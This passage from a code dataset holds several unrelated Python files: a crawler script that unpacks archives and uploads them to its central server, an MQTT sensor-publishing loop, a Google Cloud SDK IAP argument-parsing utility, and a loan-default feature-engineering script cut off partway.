TRobotProject.create_project_from_exported_files(\n self.logger,\n self.args.web_domain,\n files,\n web_domains\n )\n\n headers = {\n DLROBOT_HEADER_KEYS.EXIT_CODE: 0,\n DLROBOT_HEADER_KEYS.PROJECT_FILE: os.path.basename(robot_project_path),\n DLROBOT_HEADER_KEYS.WORKER_HOST_NAME: platform.node(),\n \"Content-Type\": \"application/binary\"\n }\n self.logger.debug(\"send results back for {}\".format(robot_project_path))\n dlrobot_results_file_name = os.path.basename(robot_project_path) + \".tar.gz\"\n project_folder = self.args.web_domain\n with tarfile.open(dlrobot_results_file_name, \"w:gz\") as tar:\n for f in os.listdir(project_folder):\n tar.add(os.path.join(project_folder, f), arcname=f)\n\n self.logger.debug(\n \"created file {} size={}\".format(dlrobot_results_file_name, os.stat(dlrobot_results_file_name).st_size))\n\n max_send_try_count = 3\n for try_id in range(max_send_try_count):\n conn = None\n try:\n conn = http.client.HTTPConnection(self.args.server_address, timeout=self.args.http_put_timeout)\n with open(dlrobot_results_file_name, \"rb\") as inp:\n self.logger.debug(\"put file {} to {}\".format(dlrobot_results_file_name, self.args.server_address))\n conn.request(\"PUT\", dlrobot_results_file_name, inp.read(), headers=headers)\n response = conn.getresponse()\n conn.close()\n conn = None\n self.logger.debug(\"sent dlrobot result file {}, size={}, http_code={}\".format(\n dlrobot_results_file_name,\n os.stat(dlrobot_results_file_name).st_size,\n response.status))\n break\n except Exception as exc:\n self.logger.error('worker got {}'.format(type(exc).__name__))\n self.logger.error('try_id = {} out of {}'.format(try_id, max_send_try_count))\n if conn is not None:\n conn.close()\n if try_id == max_send_try_count - 1:\n self.logger.debug(\"give up, we cannot send the results back, so the results are useless\")\n else:\n sleep_seconds = (try_id + 1) * 180\n self.logger.debug('sleep for {} seconds'.format(sleep_seconds))\n time.sleep(sleep_seconds)\n\n self.logger.debug(\"delete file {}\".format(dlrobot_results_file_name))\n os.unlink(dlrobot_results_file_name)\n shutil.rmtree(project_folder, ignore_errors=True)\n time.sleep(self.args.wait_after_each_doc * len(files))\n\n def ping_central(self):\n self.logger.debug(\"pinging {}\".format(self.args.server_address))\n try:\n conn = http.client.HTTPConnection(self.args.server_address)\n conn.request(\"GET\", \"/ping\")\n response = conn.getresponse()\n self.logger.debug(\"response status = {}\".format(response.status))\n if response.status != http.HTTPStatus.OK:\n self.logger.error(\"dlrobot central does not answer\")\n answer = response.read().decode(\"utf8\").strip()\n conn.close()\n except Exception as exp:\n self.logger.error(exp)\n return False\n if answer != \"pong\":\n self.logger.error(\"ping dlrobot central, answer={}, must be 'pong'\".format(answer))\n return False\n self.logger.debug(\"dlrobot_central is alive\")\n return True\n\n def setup_environment(self):\n self.logger.debug(\"current dir: {}\".format(os.path.realpath(os.path.curdir)))\n if self.args.server_address is None:\n self.args.server_address = os.environ['DLROBOT_CENTRAL_SERVER_ADDRESS']\n self.ping_central()\n\n def dearchive_and_send(self):\n _, ext = os.path.splitext(self.args.archive_path)\n tmp_folder = \"tmp\"\n unzip = TDearchiver(self.logger, tmp_folder)\n cnt = 0\n files = list()\n for archive_index, filename, normalized_file_name in unzip.dearchive_one_archive(ext, self.args.archive_path, \"base\"):\n cnt += 1\n 
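# batch the unpacked files: every 1000 files are sent to dlrobot_central and the buffer is cleared, so a huge archive is never held (or transmitted) in one piece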
files.append(os.path.abspath(normalized_file_name))\n if cnt >= 1000:\n cnt = 0\n self.send_files_to_central(files)\n files = list()\n if len(files) > 0:\n self.send_files_to_central(files)\n shutil.rmtree(tmp_folder, ignore_errors=True)\n\n\nif __name__ == \"__main__\":\n unzipper = TUnzipper(TUnzipper.parse_args(sys.argv[1:]))\n unzipper.dearchive_and_send()\n","sub_path":"tools/dlrobot/central/scripts/fns/unzip_archive.py","file_name":"unzip_archive.py","file_ext":"py","file_size_in_byte":6928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"191903927","text":"# -*- coding: utf-8 -*-\n\nimport core\nfrom core.customers_wrapper import CustomersWrapper\nfrom core.spatial_point import SpatialPoint\n\n\n\nif __name__ == '__main__':\n\n dublin_office = SpatialPoint(53.3381985, -6.2592576, \"Dublin Office\")\n radius = 100\n\n customers_wrapper = CustomersWrapper()\n customers_nearby = customers_wrapper.get_customers_nearby(dublin_office, radius)\n\n for customer in customers_nearby:\n print (\"Name: {name:20} Id: {user_id}\".format(name = customer.name, user_id = customer.user_id))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"612070371","text":"import i2c_arduino_mod as i2c\nimport time\nimport json\nimport unixtime_api as clock\nfrom mqtt import mqtt\nfrom config import config\nimport datetime\nimport temp as w1temp\n\nph = config.topic\nmqtt_url = config.mqtt_url\ntime_url = config.time_url\nlist_name = config.list_name\ntb = \"topic/tb\"\ntemp = \"topic/temp\"\n\ntb_mqtt = mqtt(tb, mqtt_url)\nph_mqtt = mqtt(ph, mqtt_url)\ntemp_mqtt = mqtt(temp, mqtt_url)\n# sensor type 1 for ph, 2 for turbidity\n# single polling loop: read the sensors, timestamp the readings and publish them\n# over MQTT; errors are logged and polling continues\nwhile True:\n try:\n ph_value = str(i2c.read_arduino(11, 1))\n tb_value = str(i2c.read_arduino(11, 2))\n temp_value = str(w1temp.read_value())\n current_time = str(clock.getnow(time_url, list_name))\n ph_data = {\"time\": current_time, \"value\": ph_value}\n tb_data = {\"time\": current_time, \"value\": tb_value}\n temp_data = {\"time\": current_time, \"value\": temp_value}\n temp_mqtt.send(json.dumps(temp_data))\n ph_mqtt.send(json.dumps(ph_data))\n tb_mqtt.send(json.dumps(tb_data))\n time.sleep(2)\n except Exception as e:\n print(\"error occurred: \")\n print(e)\n time.sleep(2)\n \n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"69851024","text":"# -*- coding: utf-8 -*- #\n# Copyright 2019 Google LLC. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Utils for IAP commands.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom googlecloudsdk.api_lib.iap import util as iap_api\nfrom googlecloudsdk.calliope import exceptions as calliope_exc\nfrom googlecloudsdk.command_lib.iam import iam_util\nfrom googlecloudsdk.command_lib.iap import exceptions as iap_exc\nfrom googlecloudsdk.core import properties\n\n\nAPP_ENGINE_RESOURCE_TYPE = 'app-engine'\nBACKEND_SERVICES_RESOURCE_TYPE = 'backend-services'\nWEB_RESOURCE_TYPE = 'iap_web'\nCOMPUTE_RESOURCE_TYPE = 'compute'\nORG_RESOURCE_TYPE = 'organization'\nFOLDER_RESOURCE_TYPE = 'folder'\nRESOURCE_TYPE_ENUM = (APP_ENGINE_RESOURCE_TYPE, BACKEND_SERVICES_RESOURCE_TYPE)\nSETTING_RESOURCE_TYPE_ENUM = (APP_ENGINE_RESOURCE_TYPE, WEB_RESOURCE_TYPE,\n COMPUTE_RESOURCE_TYPE, ORG_RESOURCE_TYPE,\n FOLDER_RESOURCE_TYPE)\n\n\ndef AddIapIamResourceArgs(parser):\n \"\"\"Adds flags for an IAP IAM resource.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n group = parser.add_group()\n group.add_argument(\n '--resource-type',\n choices=RESOURCE_TYPE_ENUM,\n help='Resource type of the IAP IAM resource.')\n group.add_argument(\n '--service',\n help='Service name.')\n group.add_argument(\n '--version',\n help='Service version. Should only be specified with '\n '`--resource-type=app-engine`.')\n\n\ndef AddIapResourceArgs(parser):\n \"\"\"Adds flags for an IAP resource.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n group = parser.add_group()\n group.add_argument(\n '--resource-type',\n required=True,\n choices=RESOURCE_TYPE_ENUM,\n help='Resource type of the IAP resource.')\n group.add_argument(\n '--service',\n help='Service name. Required with `--resource-type=backend-services`.')\n\n\ndef AddIapSettingArg(parser):\n \"\"\"Adds flags for an IAP settings resource.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n group = parser.add_group()\n group.add_argument('--organization', help='Organization ID.')\n group.add_argument('--folder', help='Folder ID.')\n group.add_argument('--project', help='Project ID.')\n group.add_argument(\n '--resource-type',\n choices=SETTING_RESOURCE_TYPE_ENUM,\n help='Resource type of the IAP resource.')\n group.add_argument(\n '--service',\n help='Service name. Required when resource type is ``app-engine'', optional when resource type is ``compute''.'\n )\n group.add_argument(\n '--version',\n help='Version name. Optional when resource type is ``app-engine''.')\n\n\ndef AddOauthClientArgs(parser):\n \"\"\"Adds OAuth client args.\n\n Args:\n parser: An argparse.ArgumentParser-like object. 
It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n group = parser.add_group()\n group.add_argument(\n '--oauth2-client-id',\n required=True,\n help='OAuth 2.0 client ID to use.')\n group.add_argument(\n '--oauth2-client-secret',\n required=True,\n help='OAuth 2.0 client secret to use.')\n\n\ndef AddAddIamPolicyBindingArgs(parser):\n # TODO(b/123070972) Add completers\n iam_util.AddArgsForAddIamPolicyBinding(\n parser,\n add_condition=True)\n\n\ndef AddRemoveIamPolicyBindingArgs(parser):\n # TODO(b/123070972) Add completers\n iam_util.AddArgsForRemoveIamPolicyBinding(\n parser,\n add_condition=True)\n\n\ndef AddIAMPolicyFileArg(parser):\n \"\"\"Adds flags for an IAM policy file.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n parser.add_argument(\n 'policy_file', help='JSON or YAML file containing the IAM policy.')\n\n\ndef AddIapSettingFileArg(parser):\n \"\"\"Add flags for the IAP setting file.\n\n Args:\n parser: An argparse.ArgumentParser-like object. It is mocked out in order to\n capture some information, but behaves like an ArgumentParser.\n \"\"\"\n parser.add_argument(\n 'setting_file', help='JSON file containing the IAP resource settings')\n\n\ndef ParseIapIamResource(release_track, args):\n \"\"\"Parse an IAP IAM resource from the input arguments.\n\n Args:\n release_track: base.ReleaseTrack, release track of command.\n args: an argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Raises:\n calliope_exc.InvalidArgumentException: if a provided argument does not apply\n to the specified resource type.\n iap_exc.InvalidIapIamResourceError: if an IapIamResource could not be parsed\n from the arguments.\n\n Returns:\n The specified IapIamResource\n \"\"\"\n project = properties.VALUES.core.project.GetOrFail()\n if not args.resource_type:\n if args.service:\n raise calliope_exc.InvalidArgumentException(\n '--service',\n '`--service` cannot be specified without `--resource-type`.')\n if args.version:\n raise calliope_exc.InvalidArgumentException(\n '--version',\n '`--version` cannot be specified without `--resource-type`.')\n return iap_api.IAPWeb(\n release_track,\n project)\n elif args.resource_type == APP_ENGINE_RESOURCE_TYPE:\n if args.service and args.version:\n return iap_api.AppEngineServiceVersion(\n release_track,\n project,\n args.service,\n args.version)\n elif args.service:\n return iap_api.AppEngineService(\n release_track,\n project,\n args.service)\n if args.version:\n raise calliope_exc.InvalidArgumentException(\n '--version',\n '`--version` cannot be specified without `--service`.')\n return iap_api.AppEngineApplication(\n release_track,\n project)\n elif args.resource_type == BACKEND_SERVICES_RESOURCE_TYPE:\n if args.version:\n raise calliope_exc.InvalidArgumentException(\n '--version',\n '`--version` cannot be specified for '\n '`--resource-type=backend-services`.')\n if args.service:\n return iap_api.BackendService(\n release_track,\n project,\n args.service)\n return iap_api.BackendServices(\n release_track,\n project)\n\n # This shouldn't be reachable, based on the IAP IAM resource parsing logic.\n raise iap_exc.InvalidIapIamResourceError('Could not parse IAP IAM resource.')\n\n\ndef ParseIapResource(release_track, args):\n \"\"\"Parse an IAP resource from the input arguments.\n\n Args:\n release_track: base.ReleaseTrack, release track of command.\n args: an 
argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Raises:\n calliope_exc.InvalidArgumentException: if `--version` was specified with\n resource type 'backend-services'.\n iap_exc.InvalidIapIamResourceError: if an IapIamResource could not be parsed\n from the arguments.\n\n Returns:\n The specified IapIamResource\n \"\"\"\n project = properties.VALUES.core.project.GetOrFail()\n if args.resource_type:\n if args.resource_type == APP_ENGINE_RESOURCE_TYPE:\n if args.service:\n raise calliope_exc.InvalidArgumentException(\n '--service',\n '`--service` cannot be specified for '\n '`--resource-type=app-engine`.')\n return iap_api.AppEngineApplication(\n release_track,\n project)\n elif args.resource_type == BACKEND_SERVICES_RESOURCE_TYPE:\n if not args.service:\n raise calliope_exc.RequiredArgumentException(\n '--service',\n '`--service` must be specified for '\n '`--resource-type=backend-services`.')\n return iap_api.BackendService(\n release_track,\n project,\n args.service)\n\n raise iap_exc.InvalidIapIamResourceError('Could not parse IAP resource.')\n\n\ndef ParseIapSettingsResource(release_track, args):\n \"\"\"Parse an IAP setting resource from the input arguments.\n\n Args:\n release_track: base.ReleaseTrack, release track of command.\n args: an argparse namespace. All the arguments that were provided to this\n command invocation.\n\n Raises:\n calliope_exc.InvalidArgumentException: if `--version` was specified with\n resource type 'backend-services'.\n\n Returns:\n The specified IapSettingsResource\n \"\"\"\n if args.organization:\n if args.resource_type:\n raise calliope_exc.InvalidArgumentException(\n '--resource-type',\n '`--resource-type` should not be specified at organization level')\n if args.project:\n raise calliope_exc.InvalidArgumentException(\n '--project',\n '`--project` should not be specified at organization level')\n return iap_api.IapSettingsResource(\n release_track, 'organizations/{0}'.format(args.organization))\n if args.folder:\n if args.resource_type:\n raise calliope_exc.InvalidArgumentException(\n '--resource-type',\n '`--resource-type` should not be specified at folder level')\n if args.project:\n raise calliope_exc.InvalidArgumentException(\n '--project', '`--project` should not be specified at folder level')\n return iap_api.IapSettingsResource(release_track,\n 'folders/{0}'.format(args.folder))\n if args.project:\n if not args.resource_type:\n return iap_api.IapSettingsResource(release_track,\n 'projects/{0}'.format(args.project))\n else:\n if args.resource_type == WEB_RESOURCE_TYPE:\n return iap_api.IapSettingsResource(\n release_track, 'projects/{0}/iap_web'.format(args.project))\n elif args.resource_type == APP_ENGINE_RESOURCE_TYPE:\n if not args.service:\n raise calliope_exc.RequiredArgumentException(\n '--service', '`--service` must be specified for '\n '`--resource-type=app-engine`.')\n else:\n if args.version:\n return iap_api.IapSettingsResource(\n release_track,\n 'projects/{0}/iap_web/appengine-{1}/services/{2}/versions/{3}'\n .format(args.project, args.project, args.service, args.version))\n else:\n return iap_api.IapSettingsResource(\n release_track,\n 'projects/{0}/iap_web/appengine-{1}/services/{2}'.format(\n args.project, args.project, args.service))\n elif args.resource_type == COMPUTE_RESOURCE_TYPE:\n if args.service:\n return iap_api.IapSettingsResource(\n release_track, 'projects/{0}/iap_web/compute/services/{1}'.format(\n args.project, args.service))\n else:\n return iap_api.IapSettingsResource(\n 
release_track,\n 'projects/{0}/iap_web/compute'.format(args.project))\n else:\n raise iap_exc.InvalidIapIamResourceError(\n 'Unsupported IAP settings resource type.')\n\n raise iap_exc.InvalidIapIamResourceError(\n 'Could not parse IAP settings resource.')\n","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/iap/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":11949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"72578707","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 28 14:24:32 2018\n\n@author: neha\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 27 20:12:07 2018\n\n@author: neha\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier, ExtraTreesClassifier\nfrom sklearn.metrics import make_scorer, auc, confusion_matrix, accuracy_score, f1_score, precision_score, recall_score, roc_auc_score, roc_curve\nimport lightgbm as lgb\nimport xgboost as xgb\nimport random\nimport pickle\nimport matplotlib.pyplot as plt\nfrom imblearn.over_sampling import SMOTE\nfrom sklearn.decomposition import PCA\nfrom lightgbm import LGBMClassifier, cv\nimport gc\nimport csv\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom scipy import stats\nfrom sklearn.linear_model import LogisticRegression\n\n\n#################################################\n# load train and dev set skids\n#################################################\ndef get_train_dev_sets():\n with open(\"train_all.txt\", \"rb\") as fp:\n train_all_skid = pickle.load(fp)\n \n with open(\"dev_all.txt\", \"rb\") as fp:\n dev_all_skid = pickle.load(fp)\n \n with open(\"dev_eyeball.txt\", \"rb\") as fp:\n dev_eyeball_skid = pickle.load(fp)\n \n return train_all_skid, dev_all_skid, dev_eyeball_skid\n\n###############################################\n# from previous experiments, important columns\n###############################################\ndef get_base_important_columns():\n important_columns = ['CNT_CHILDREN', 'AMT_INCOME_TOTAL', 'AMT_CREDIT', 'AMT_ANNUITY',\n 'AMT_GOODS_PRICE', 'REGION_POPULATION_RELATIVE', 'DAYS_BIRTH',\n 'DAYS_EMPLOYED', 'DAYS_REGISTRATION', 'DAYS_ID_PUBLISH', 'OWN_CAR_AGE',\n 'FLAG_WORK_PHONE', 'CNT_FAM_MEMBERS', 'REGION_RATING_CLIENT_W_CITY',\n 'HOUR_APPR_PROCESS_START', 'REG_CITY_NOT_LIVE_CITY', 'EXT_SOURCE_1',\n 'EXT_SOURCE_2', 'EXT_SOURCE_3', 'APARTMENTS_AVG',\n 'YEARS_BEGINEXPLUATATION_AVG', 'YEARS_BUILD_AVG', 'FLOORSMAX_AVG',\n 'LIVINGAPARTMENTS_AVG', 'LIVINGAREA_AVG',\n 'YEARS_BEGINEXPLUATATION_MODE', 'FLOORSMAX_MODE',\n 'LIVINGAPARTMENTS_MODE', 'APARTMENTS_MEDI', 'BASEMENTAREA_MEDI',\n 'FLOORSMIN_MEDI', 'LIVINGAREA_MEDI', 'NONLIVINGAREA_MEDI',\n 'TOTALAREA_MODE', 'OBS_30_CNT_SOCIAL_CIRCLE',\n 'DEF_30_CNT_SOCIAL_CIRCLE', 'OBS_60_CNT_SOCIAL_CIRCLE',\n 'DEF_60_CNT_SOCIAL_CIRCLE', 'DAYS_LAST_PHONE_CHANGE', 'FLAG_DOCUMENT_2',\n 'FLAG_DOCUMENT_3', 'FLAG_DOCUMENT_16', 'FLAG_DOCUMENT_18',\n 'FLAG_DOCUMENT_21', 'AMT_REQ_CREDIT_BUREAU_MON',\n 'AMT_REQ_CREDIT_BUREAU_QRT', 'AMT_REQ_CREDIT_BUREAU_YEAR',\n 'NAME_CONTRACT_TYPE_Cash loans', 'NAME_CONTRACT_TYPE_Revolving loans',\n 'CODE_GENDER_F', 'CODE_GENDER_M', 'FLAG_OWN_CAR_N', 'FLAG_OWN_CAR_Y',\n 'NAME_INCOME_TYPE_Commercial associate',\n 'NAME_INCOME_TYPE_Maternity leave', 'NAME_INCOME_TYPE_Unemployed',\n 
'NAME_INCOME_TYPE_Working', 'NAME_EDUCATION_TYPE_Higher education',\n 'NAME_EDUCATION_TYPE_Lower secondary',\n 'NAME_EDUCATION_TYPE_Secondary / secondary special',\n 'NAME_FAMILY_STATUS_Civil marriage', 'NAME_FAMILY_STATUS_Married',\n 'NAME_FAMILY_STATUS_Separated', 'NAME_HOUSING_TYPE_House / apartment',\n 'NAME_HOUSING_TYPE_Municipal apartment',\n 'NAME_HOUSING_TYPE_Rented apartment', 'OCCUPATION_TYPE_Core staff',\n 'OCCUPATION_TYPE_Drivers', 'OCCUPATION_TYPE_Laborers',\n 'OCCUPATION_TYPE_Low-skill Laborers', 'OCCUPATION_TYPE_Sales staff',\n 'WEEKDAY_APPR_PROCESS_START_FRIDAY',\n 'WEEKDAY_APPR_PROCESS_START_SATURDAY',\n 'ORGANIZATION_TYPE_Business Entity Type 3',\n 'ORGANIZATION_TYPE_Construction', 'ORGANIZATION_TYPE_Industry: type 1',\n 'ORGANIZATION_TYPE_Mobile', 'ORGANIZATION_TYPE_Realtor',\n 'ORGANIZATION_TYPE_Self-employed', 'ORGANIZATION_TYPE_Trade: type 7',\n 'ORGANIZATION_TYPE_Transport: type 3', 'loan_annutiy_ratio']\n \n return important_columns\n\n###################################\n# get False positive rate\n###################################\ndef get_FPR(y_true, y_pred):\n cm = confusion_matrix(y_true, y_pred)\n FP = cm[0][1]\n TN = cm[0][0]\n FPR = FP/(FP+TN)\n return FPR\n\n\ndef get_scores(y_true, y_predict, y_predict_proba, mode):\n scores_df = pd.Series()\n\n scores_df[mode+'_roc_auc'] = roc_auc_score(y_true, y_predict_proba)\n scores_df[mode+'_accuracy'] = accuracy_score(y_true, y_predict)\n scores_df[mode+'_recall'] = recall_score(y_true, y_predict)\n scores_df[mode+'_fpr'] = get_FPR(y_true, y_predict)\n scores_df[mode+'_precision'] = precision_score(y_true, y_predict)\n scores_df[mode+'_f1'] = f1_score(y_true, y_predict)\n \n return scores_df\n####################################################################\n# One-hot encoding for categorical columns with get_dummies\n####################################################################\ndef one_hot_encoder(df, nan_as_category = True):\n original_columns = list(df.columns)\n categorical_columns = list(df.select_dtypes(['object']).columns)\n df = pd.get_dummies(df, columns= categorical_columns, dummy_na= nan_as_category)\n new_columns = [c for c in df.columns if c not in original_columns]\n return df, new_columns\n\n##################################################################\n# measure the slope of the time series\n##################################################################\ndef linear_fit(df):\n col_x = df.columns[0]\n col_y = df.columns[1]\n \n # regress the value column (second) on the time column (first)\n x = df[col_x].values\n y = df[col_y].values\n \n slope, intercept, r_value, p_value, std_err = stats.linregress(x,y)\n \n return slope\n#####################################################################\n# get application train test features\n####################################################################\n\ndef get_application_train_test(nan_as_category=False):\n application_train = pd.read_csv('application_train.csv') # (307511, 122)\n application_test = pd.read_csv('application_test.csv') # (48744, 121)\n \n one_hot_df = application_train.append(application_test).reset_index()\n\n del application_train, application_test\n gc.collect()\n # Optional: Remove 4 applications with XNA CODE_GENDER (train set)\n one_hot_df = one_hot_df[one_hot_df['CODE_GENDER'] != 'XNA']\n \n # Categorical features with Binary encode (0 or 1; two categories)\n for bin_feature in ['CODE_GENDER', 'FLAG_OWN_CAR', 'FLAG_OWN_REALTY']:\n one_hot_df[bin_feature], uniques = pd.factorize(one_hot_df[bin_feature])\n \n mean_EXT_SOURCE_1 = 
one_hot_df[~one_hot_df.isnull()].EXT_SOURCE_1.mean()\n mean_EXT_SOURCE_3 = one_hot_df[~one_hot_df.isnull()].EXT_SOURCE_3.mean()\n \n one_hot_df['EXT_SOURCE_1'] = one_hot_df['EXT_SOURCE_1'].fillna(mean_EXT_SOURCE_1)\n one_hot_df['EXT_SOURCE_3'] = one_hot_df['EXT_SOURCE_3'].fillna(mean_EXT_SOURCE_3)\n \n # NaN values for DAYS_EMPLOYED: 365.243 -> nan\n one_hot_df['DAYS_EMPLOYED'].replace(365243, np.nan, inplace= True)\n \"\"\"\n one_hot_df.loc[one_hot_df['OWN_CAR_AGE'] > 80, 'OWN_CAR_AGE'] = np.nan\n one_hot_df.loc[one_hot_df['REGION_RATING_CLIENT_W_CITY'] < 0, 'REGION_RATING_CLIENT_W_CITY'] = np.nan\n one_hot_df.loc[one_hot_df['AMT_INCOME_TOTAL'] > 1e8, 'AMT_INCOME_TOTAL'] = np.nan\n one_hot_df.loc[one_hot_df['AMT_REQ_CREDIT_BUREAU_QRT'] > 10, 'AMT_REQ_CREDIT_BUREAU_QRT'] = np.nan\n one_hot_df.loc[one_hot_df['OBS_30_CNT_SOCIAL_CIRCLE'] > 40, 'OBS_30_CNT_SOCIAL_CIRCLE'] = np.nan\n \"\"\"\n \n \n docs = [_f for _f in one_hot_df.columns if 'FLAG_DOC' in _f]\n live = [_f for _f in one_hot_df.columns if ('FLAG_' in _f) & ('FLAG_DOC' not in _f) & ('_FLAG_' not in _f)]\n \n inc_by_org = one_hot_df[['AMT_INCOME_TOTAL', 'ORGANIZATION_TYPE']].groupby('ORGANIZATION_TYPE').median()['AMT_INCOME_TOTAL']\n\n # Some simple new features (percentages)\n #one_hot_df['loan_annutiy_ratio']=one_hot_df['AMT_CREDIT']/one_hot_df['AMT_ANNUITY']\n #one_hot_df['DAYS_EMPLOYED_PERC'] = one_hot_df['DAYS_EMPLOYED'] / one_hot_df['DAYS_BIRTH']\n #one_hot_df['INCOME_CREDIT_PERC'] = one_hot_df['AMT_INCOME_TOTAL'] / one_hot_df['AMT_CREDIT']\n one_hot_df['INCOME_PER_PERSON'] = one_hot_df['AMT_INCOME_TOTAL'] / one_hot_df['CNT_FAM_MEMBERS']\n #one_hot_df['ANNUITY_INCOME_PERC'] = one_hot_df['AMT_ANNUITY'] / one_hot_df['AMT_INCOME_TOTAL']\n one_hot_df['PAYMENT_RATE'] = one_hot_df['AMT_ANNUITY'] / one_hot_df['AMT_CREDIT']\n one_hot_df['CHILDREN_RATIO'] = one_hot_df['CNT_CHILDREN'] / one_hot_df['CNT_FAM_MEMBERS']\n \n one_hot_df['NEW_CREDIT_TO_GOODS_RATIO'] = one_hot_df['AMT_CREDIT'] / one_hot_df['AMT_GOODS_PRICE']\n one_hot_df['NEW_DOC_IND_KURT'] = one_hot_df[docs].kurtosis(axis=1)\n one_hot_df['NEW_LIVE_IND_SUM'] = one_hot_df[live].sum(axis=1)\n one_hot_df['NEW_INC_PER_CHLD'] = one_hot_df['AMT_INCOME_TOTAL'] / (1 + one_hot_df['CNT_CHILDREN'])\n one_hot_df['NEW_INC_BY_ORG'] = one_hot_df['ORGANIZATION_TYPE'].map(inc_by_org)\n one_hot_df['NEW_EMPLOY_TO_BIRTH_RATIO'] = one_hot_df['DAYS_EMPLOYED'] / one_hot_df['DAYS_BIRTH']\n one_hot_df['NEW_ANNUITY_TO_INCOME_RATIO'] = one_hot_df['AMT_ANNUITY'] / (1 + one_hot_df['AMT_INCOME_TOTAL'])\n one_hot_df['NEW_SOURCES_PROD'] = one_hot_df['EXT_SOURCE_1'] * one_hot_df['EXT_SOURCE_2'] * one_hot_df['EXT_SOURCE_3']\n one_hot_df['NEW_EXT_SOURCES_MEAN'] = one_hot_df[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']].mean(axis=1)\n one_hot_df['NEW_SCORES_STD'] = one_hot_df[['EXT_SOURCE_1', 'EXT_SOURCE_2', 'EXT_SOURCE_3']].std(axis=1)\n one_hot_df['NEW_SCORES_STD'] = one_hot_df['NEW_SCORES_STD'].fillna(one_hot_df['NEW_SCORES_STD'].mean())\n one_hot_df['NEW_CAR_TO_BIRTH_RATIO'] = one_hot_df['OWN_CAR_AGE'] / one_hot_df['DAYS_BIRTH']\n one_hot_df['NEW_CAR_TO_EMPLOY_RATIO'] = one_hot_df['OWN_CAR_AGE'] / one_hot_df['DAYS_EMPLOYED']\n one_hot_df['NEW_PHONE_TO_BIRTH_RATIO'] = one_hot_df['DAYS_LAST_PHONE_CHANGE'] / one_hot_df['DAYS_BIRTH']\n one_hot_df['NEW_PHONE_TO_BIRTH_RATIO_EMPLOYER'] = one_hot_df['DAYS_LAST_PHONE_CHANGE'] / one_hot_df['DAYS_EMPLOYED']\n one_hot_df['NEW_CREDIT_TO_INCOME_RATIO'] = one_hot_df['AMT_CREDIT'] / one_hot_df['AMT_INCOME_TOTAL']\n \n dropcolum=['FLAG_DOCUMENT_2','FLAG_DOCUMENT_4',\n 
'FLAG_DOCUMENT_5','FLAG_DOCUMENT_6','FLAG_DOCUMENT_7',\n 'FLAG_DOCUMENT_8','FLAG_DOCUMENT_9','FLAG_DOCUMENT_10', \n 'FLAG_DOCUMENT_11','FLAG_DOCUMENT_12','FLAG_DOCUMENT_13',\n 'FLAG_DOCUMENT_14','FLAG_DOCUMENT_15','FLAG_DOCUMENT_16',\n 'FLAG_DOCUMENT_17','FLAG_DOCUMENT_18','FLAG_DOCUMENT_19',\n 'FLAG_DOCUMENT_20','FLAG_DOCUMENT_21']\n one_hot_df= one_hot_df.drop(dropcolum,axis=1)\n\n one_hot_df, cat_cols = one_hot_encoder(one_hot_df, nan_as_category)\n\n return one_hot_df\n\n#########################################\n# bureau_features\n#########################################\ndef get_bureau_features(nan_as_category = False):\n \n bureau = pd.read_csv('bureau.csv')\n bureau, bureau_cat = one_hot_encoder(bureau, nan_as_category)\n \n cat_aggregations = {}\n for cat in bureau_cat: \n cat_aggregations[cat] = ['mean', 'sum']\n \n bureau['PAYMENT_RATE'] = bureau['AMT_CREDIT_SUM'] / bureau['AMT_ANNUITY']\n \n agg_dict= {\n #'SK_ID_CURR': ['count'],\n 'DAYS_CREDIT': ['min', 'max', 'mean', 'var'],\n 'CREDIT_DAY_OVERDUE': ['max', 'mean'],\n 'DAYS_CREDIT_ENDDATE': ['sum', 'min', 'max', 'mean'],\n 'DAYS_CREDIT_UPDATE': ['mean'],\n 'DAYS_ENDDATE_FACT': ['sum', 'min', 'max'],\n 'AMT_CREDIT_MAX_OVERDUE': ['sum', 'mean'], \n 'CNT_CREDIT_PROLONG': ['sum'], \n 'AMT_CREDIT_SUM': ['sum', 'max', 'mean'], \n 'AMT_CREDIT_SUM_DEBT': ['max', 'mean', 'sum'], \n 